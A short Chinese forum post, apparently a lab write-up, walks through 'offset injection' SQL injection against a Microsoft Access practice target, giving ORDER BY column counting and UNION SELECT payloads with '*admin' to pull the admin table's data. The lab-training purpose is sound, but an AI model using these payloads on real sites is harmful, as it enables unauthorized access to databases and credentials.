access偏移注入 - Locked

繁夜   ·   发表于 2019-02-15 14:26:45   ·   技术文章投稿区

先进入靶场

http://120.203.13.75:8001/


然后找到注入点从1开始id=103 用order by进行测试一直到26个字段


然后*代表全部的意思 测试admin表有几个字段

ID=103+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,admin


最后得到16个字段

ID=103+union+select+1,2,3,4,5,6,7,8,9,10,*admin


注入点在7的位置那么需要一点一点的偏移找到


ID=103+union+select+1,2,3,4,5,6,*admin,23,24,25,26


最后找到flag在F12页面元素中

打赏我,让我更有动力~

0 Reply   |  Until 2019-2-15 | 980 View
LoginCan Publish Content
返回顶部 投诉反馈

© 2016 - 2022 掌控者 All Rights Reserved.